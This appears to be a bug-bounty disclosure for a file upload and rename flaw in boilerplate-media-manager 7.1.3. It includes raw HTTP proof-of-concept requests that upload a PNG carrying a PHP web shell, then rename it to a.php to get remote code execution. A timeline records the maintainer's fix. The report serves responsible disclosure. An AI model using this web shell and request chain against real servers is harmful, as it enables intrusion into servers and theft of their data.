Unrestricted Upload of File with Dangerous Type in sebastienheyd/boilerplate-media-manager

Valid

Reported on

Nov 1st 2021


Description

RCE via 'Rename Media' after upload media on boilerplate-media-manager 7.1.3

Proof of Concept

// PoC.req upload media
POST /admin/medias/ajax/upload HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-CSRF-TOKEN: VNL1M7fO86z2EXdTD9fJ0svbf4RhiW8USovhlhsR
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------183859686142009980571607070685
Content-Length: 461
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/admin/medias
Cookie: 127001corebos=id8sv6vt012aj21319s5q16lp8; PHPSESSID=tjrsiun42kolr8imto0cv5qvpd; XSRF-TOKEN=eyJpdiI6ImVJMlNSNEJhdGpXWHVrWmhlcjdvUWc9PSIsInZhbHVlIjoiczNBVGJ5N2tUZktWalVUMWJJc05KS1NmeFhVSzhNYjBPekV0TXRrS3drWXpmYzY2d2tGUmd0Ymhndkk2NHNYenZNQlVhc0dPUlRsbEdHcEQ0MkFqdVVrTFZ0S20vSXB1V1FyK3BLQnIzQ09IZlFCZm1SOStMV2hvRlc2blFLNFEiLCJtYWMiOiI1ZDgxNDA1YmIyMTZmY2E5ODlmNjc2MDEyMTNiYTFjYjM4NGM5OGVjZjIwMWJhZWY0Y2Q1NmM5MjgwMTI0MmE0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlJiOC9TNmo3WFdFeHRVbXVBbWZheHc9PSIsInZhbHVlIjoidXlXNFdEcTlkbTNOM1JvMmlDcElhNEZ5MzRSSEQxbVlnVmZDTXdBd0wyVnJTa3kvZEdyc3dwUXh5S2phVW1UVUR1VWU4U3ZVWjNXcG9aUVFZM2VhclJkR0txMW92L2x4L3BJcjRZWkJ5dDd3SDA0Q0VQbkNIVEE0WEw1WlNWNXkiLCJtYWMiOiJjZjc4NjM2NzA5MDZlNDhhNmE5MjM5MDQzMTRkMzRhNmViYmM5YTA0MGZmZDk3YzA2MGE2YzUxYjY1YTZkMGYyIiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------183859686142009980571607070685
Content-Disposition: form-data; name="path"

/admin/medias
-----------------------------183859686142009980571607070685
Content-Disposition: form-data; name="file"; filename="a.php.png"
Content-Type: image/png

‰PNG


IHDR

PXê$tEXtshell<?php system($_GET['cmd']); ?>é­­µ
IDATxœc`¤6VÑÈIEND®B`‚
-----------------------------183859686142009980571607070685--
// POC.req rename media
POST /admin/medias/ajax/rename HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-TOKEN: VNL1M7fO86z2EXdTD9fJ0svbf4RhiW8USovhlhsR
X-Requested-With: XMLHttpRequest
Content-Length: 41
Origin: http://127.0.0.1:8000
Connection: close
Referer: http://127.0.0.1:8000/admin/medias
Cookie: 127001corebos=id8sv6vt012aj21319s5q16lp8; PHPSESSID=tjrsiun42kolr8imto0cv5qvpd; XSRF-TOKEN=eyJpdiI6InoyNEZISjZWMzN0NUhGUnZPUnNKeHc9PSIsInZhbHVlIjoiWVNHYitEWWJyZDZBRTB6bXV3NmtWUnlMZTZxSWlnN1pndUVzYnNNTHc1YVNNWVVoY2dvWGFNd2h1dFZpbkxtUjEzZ0o5NDY4M2VTaVA5cUlPR1BwQ1hGcE53ZVQ0YytEMWRTcjBFQ2FMcjRXYUM1YzN0VzNMc2VnMTdsOXNlaUIiLCJtYWMiOiI0Y2ViYzBlMGU0YjMwNTk1Y2UxYWMwOTYxZmNjMWM3Y2EwZDRlY2YyZjBhY2FmYmI1ZDg1NjU1NTQyMTE5Y2M0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IndqY2Rzc3A0ZEpRZXFsalZ3UU40TXc9PSIsInZhbHVlIjoidDdRUXBkN0F6Z0RqS2U4R3B4Z3ozbk1NN0ttTldzaWp1bmV0ZmZTMXJmc25NNnpBQjhUZUdaQk9GVVJ5Sklob1JRV292VDZZbmtPNW9nRG9XT3JHbGg1ZHBucGRMQ1AxdE1TQ3R2cVJZeFRXWnEzYS8rZmQwZFFvQWFIQ2lZKzIiLCJtYWMiOiI3MDQ2YjI3OTcwZjY3NjI2ZjJhNjRhODQzNzEzOWE4ZWVmYzVhMzMxZWQxOWViNTAwMjRkMzZmMWZhNDNmNTc0IiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

path=%2F&fileName=a.php.png&newName=a.php

Step to Reproduct

Using Exiftool inject PHP code into the picture with name like : a.php.png

After upload success, rename media to : a.php

Impact

This vulnerability could potentially allow an attacker to gain access to a web server and steal sensitive content stored on the web server.

Recomendation

Filename format should be checked before doing rename. Do not allow to change the file extension

We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
We have contacted a member of the sebastienheyd/boilerplate-media-manager team and are waiting to hear back a month ago
We have sent a follow up to the sebastienheyd/boilerplate-media-manager team. We will try again in 7 days. 23 days ago
sebastienheyd validated this vulnerability 23 days ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
sebastienheyd confirmed that a fix has been merged on 4e4c5e 23 days ago
The fix bounty has been dropped